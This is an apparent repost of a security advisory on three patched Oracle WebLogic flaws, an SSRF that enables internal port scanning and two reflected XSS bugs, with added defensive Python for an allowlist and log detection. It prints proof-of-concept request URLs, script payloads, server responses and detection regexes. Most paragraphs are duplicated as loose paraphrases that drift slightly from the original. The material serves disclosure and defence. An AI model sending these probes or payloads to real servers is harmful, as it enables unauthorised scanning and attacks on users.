[Ref] http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html

WebLogic SSRF and XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)

Monday, March 30, 2015 at 7:51AM

Universal Description Discovery and Integration (UDDI) functionality often lurks unlinked but externally accessible on WebLogic servers. It’s trivially discoverable using fuzz lists such as Weblogic.fuzz.txt and was, until recently, vulnerable to Cross Site Scripting (XSS) and Server Side Request Forgery (SSRF). I reported these vulnerabilities to Oracle and they were patched in the July 2014 Critical Patch Update (CPU).

The UDDI functionality of WebLogic servers is usually hidden but externally accessible. It is easy to discover with weblogic.fuzz.txt, but only recently was it found to be vulnerable to XSS and SSRF. I reported these vulnerabilities to Oracle (which acquired Sun), and the vendor fixed them in the July 2014 Critical Patch Update.

CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jsp

Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6

Oracle WebLogic web server is often both (a) externally accessible; and (b) permitted to invoke connections to internal hosts. The SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to cause the WebLogic web server to connect to an arbitrary TCP port of an arbitrary host. Responses returned are fairly verbose and can be used to infer whether a service is listening on the port specified.

Oracle's WebLogic web server is usually (a) externally accessible and (b) permitted to open connections to internal hosts. The SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to make the WebLogic server connect to any port on any host. Its responses are very verbose and can be used by an attacker to infer whether a service is listening on the specified port.

Below is an example request to an internal host which is not listening on TCP port 23:

Below is an example: an internal host that is not listening on TCP port 23.

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

Response snippet:

weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused

Below is an example request to a host which is listening on TCP port 22:

Below is another example: an internal host that is listening on TCP port 22.

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

Response snippet:

weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.

It is possible to abuse this functionality to discover and port scan any host that the WebLogic server can access. In the event that a discovered service returns a valid SOAP response, it may be possible to view the contents of the response.

This functionality can be used to probe the ports of every host the WebLogic server can reach. In the example above, if the discovered service returns a valid SOAP response, the full content of that response may even be visible.

SSRF vulnerabilities offer a world of possibilities – for example, this could be used to scan for services and resources present on the WebLogic server’s loopback interface, to port scan hosts adjacent to the WebLogic server, or to profile outgoing firewall rules (e.g. port scan an external attacker-controlled server to see which outgoing connections are permitted).
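
A defensive check of the kind a reverse proxy or WAF rule could apply to the operator parameter, as an added example (it is not Oracle's patch and not code from the original post); the allowlisted hosts are taken from the public registry list in the publicinquiryurls cookie shown further down this page.

```python
"""Allowlist check for the SearchPublicRegistries.jsp 'operator' parameter.
Added example, not Oracle's fix: a front-end rule of this shape refuses the
internal-host probing shown above before any server-side request is made."""
import ipaddress
from urllib.parse import urlsplit

# Constructed allowlist: the public registry hosts that appear in the
# publicinquiryurls cookie on this page. Anything else is refused.
ALLOWED_REGISTRY_HOSTS = {"www-3.ibm.com", "uddi.rte.microsoft.com", "services.xmethods.net"}


def is_internal_address(host):
    """True if host is a literal IP in loopback, private, link-local or reserved space.
    Hostnames are not resolved here, so the allowlist is what stops DNS tricks."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved


def operator_url_allowed(operator):
    """Return (allowed, reason) for a candidate 'operator' value."""
    try:
        parts = urlsplit(operator)
        host, port = parts.hostname, parts.port  # .port raises on non-numeric ports
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not permitted"
    if not host:
        return False, "no host in URL"
    if is_internal_address(host):
        return False, f"{host} is an internal address"
    if host.lower() not in ALLOWED_REGISTRY_HOSTS:
        return False, f"{host} is not an approved UDDI registry"
    if port not in (None, 80, 443):
        return False, f"port {port} not permitted"
    return True, "ok"
```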

CVE-2014-4241 - Reflected Cross Site Scripting in SetupUDDIExplorer.jsp

Affected software: Oracle Fusion Middleware 10.0.2, 10.3.6

User input is reflected into a cookie value (which is set for a year!). This value is then written into subsequent responses in an unsafe manner, exposing users to Cross Site Scripting attacks.

User input is set into a cookie value (which, incredibly, is valid for a whole year). That value is then written in an unsafe manner into all subsequent responses, leaving users exposed to XSS attacks.

This unusual vector circumvents current in-browser anti-XSS controls present in Internet Explorer and Chrome browsers. The vulnerability was present in registration.paypal.com, payflowlink.paypal.com and partnermanager.paypal.com; all were swiftly fixed after I reported this to the PayPal security team.

This unusual attack vector bypasses the anti-XSS modules currently built into IE and Chrome. The vulnerability was present across *.paypal.com and was fixed after I reported it to the PayPal security team.

Reflected XSS in registration.paypal.com

Example Malicious URL:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL

The response sets the privateregistry parameter value previously supplied as a cookie, and redirects the browser back to the SetupUDDIExplorer.jsp page:

HTTP/1.1 302 Moved Temporarily
Location: https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp
Set-Cookie: privateinquiryurls=<script>alert(2)</script>; expires=Saturday, 29-Nov-2014 08:00:27 GMT
Content-Length: 331
Content-Type: text/html;charset=UTF-8

Redirected Request:

GET /uddiexplorer/SetupUDDIExplorer.jsp HTTP/1.1
Host: [vulnerablehost]
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; privateinquiryurls=<script>alert(2)</script>; privatepublishurls=http://[vulnerablehost]:8080/uddi/uddilistener; consumer_display=HOME_VERSION%3d1%26FORGOT_BUTTON_ROLE%3d73; cookie_check=yes; LANG=en_US%3BUS; navlns=0.0;

Response Snippet (showing the privateinquiryurls cookie value reflected in an unsafe manner in the response):

<td valign=top width=1%></td>
<td valign=top width=70%>
 <p>
 <h2>Private Registry:</h2>
 <h3>Search URL: <b><script>alert(1)</script></b></h3>
 <H3>Publish URL: <b>http://[vulnerablehost]:8080/uddi/uddilistener</b></h3>
 </p>

Example Proof of Concept URLs:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL
https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryPublish=Set+Publish+URL
https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?publicregistryname=test&publicregistryurl=<script>alert(2)</script>&addPublicRegistry=Add+Public+Registry+URL

CVE-2014-4242 - Reflected Cross Site Scripting in consolejndi.portal

Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6, 12.1.1, 12.1.2.0.0

I’ve also identified two reflected XSS vulnerabilities in WebLogic’s console application. The console application is intended to manage the WebLogic application server and is not normally externally exposed; as a result, exploitation of this vulnerability would be targeted at admin users.

I also found two reflected XSS vulnerabilities in WebLogic's console application. The console application is used to manage the WebLogic application server and is not normally exposed to the external network; as a result, exploitation would be aimed at administrator users.

Example Proof of Concept URL #1 (victim must be authenticated to the administrative console):

http://[vulnerablehost]:7001/console/consolejndi.portal?_pageLabel=JNDIContextPageGeneral&_nfpb=true&JNDIContextPortlethandle=com.bea.console.handles.JndiContextHandle("<script>alert(1)</script>")

Response Snippet:

<div class="contenttable"><div class="introText">
<p>Listing of entries found in context <script>alert(1)</script>:</p>
</div>

Example Proof of Concept URL #2 (victim must be authenticated to the administrative console):

http://[vulnerablehost]:7001/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//

Response Snippet:

<script type="text/javascript">
document.write('<div class="JSTree">');
setBaseDirectory('/console/utils/JStree/images/');
setTaxonomyDelimeter('.');
{
_a = new TreeNode('server', null, 'myserver\u0027);alert(4)//', '/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//', 'images/spacer.gif', 'images/spacer.gif', null, 'myserver\u0027);alert(4)//', false, false);
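
Detection logic for the three request patterns shown on this page (the internal-host operator probe, the script payload to SetupUDDIExplorer.jsp and the JS-string breakout against consolejndi.portal), as an added example that is not code from the original post or from Oracle; it assumes WebLogic access-log lines in common log format, and the sample lines are constructed.

```python
"""Flag access-log requests matching the three issues above (added example,
not the post's or Oracle's code; assumes WebLogic common-log-format lines)."""
import ipaddress
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')
# Markup breakout (<script ...>) or the JS-string breakout ( ');alert(1)// ) shown above.
XSS_RE = re.compile(r"<\s*script\b|'\s*\)\s*;", re.IGNORECASE)
XSS_PAGES = {"/uddiexplorer/setupuddiexplorer.jsp": "CVE-2014-4241",
             "/console/consolejndi.portal": "CVE-2014-4242"}
SSRF_PAGE = "/uddiexplorer/searchpublicregistries.jsp"
# Constructed sample lines; 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Mar/2015:07:51:00 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&btnSubmit=Search HTTP/1.1" 200 1234
203.0.113.10 - - [30/Mar/2015:07:51:02 +0000] "GET /uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=%3Cscript%3Ealert(2)%3C/script%3E&setPrivateRegistryInquiry=Set+Search+URL HTTP/1.1" 302 331
203.0.113.10 - - [30/Mar/2015:07:52:10 +0000] "GET /console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver%27);alert(1)// HTTP/1.1" 200 5678
203.0.113.10 - - [30/Mar/2015:07:53:00 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://www-3.ibm.com/services/uddi/inquiryapi&rdoSearch=name HTTP/1.1" 200 2048
"""


def internal_target(url):
    """True when the operator URL names a literal loopback/private address.
    Hostnames are not resolved here, so DNS-based targets need a separate check."""
    try:
        return ipaddress.ip_address(urlsplit(url).hostname or "").is_private
    except ValueError:
        return False


def classify(line):
    """Return a finding dict for one log line, or None if nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = parts.path.lower()
    if path == SSRF_PAGE:
        for op in parse_qs(parts.query).get("operator", []):  # percent-decoded
            if internal_target(op):
                return {"cve": "CVE-2014-4210", "src": m["ip"], "detail": op}
    elif path in XSS_PAGES:
        query = unquote_plus(parts.query)  # decode before matching
        if XSS_RE.search(query):
            return {"cve": XSS_PAGES[path], "src": m["ip"], "detail": query}
    return None


def scan(log_text):
    """Run classify over every line; returns the findings in log order."""
    return [f for f in map(classify, log_text.splitlines()) if f]
```

The benign last sample line (a request to a public registry) produces no finding, which is the false-positive case worth keeping in any rule derived from this.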

Remediation

Remove access to UDDI functionality, unless there is business case to support exposing it. Failing that, ensure that the July 2014 CPU has been applied.

Remediation: disable access to the UDDI functionality unless there is a business need for it. Make sure Oracle's July 2014 CPU (Critical Patch Update) has been applied.

Disclosure Timeline
01/12/2013 - Vulnerability Reported
07/16/2014 - Vulnerability Patch Released in Oracle Critical Patch Update (CPU)
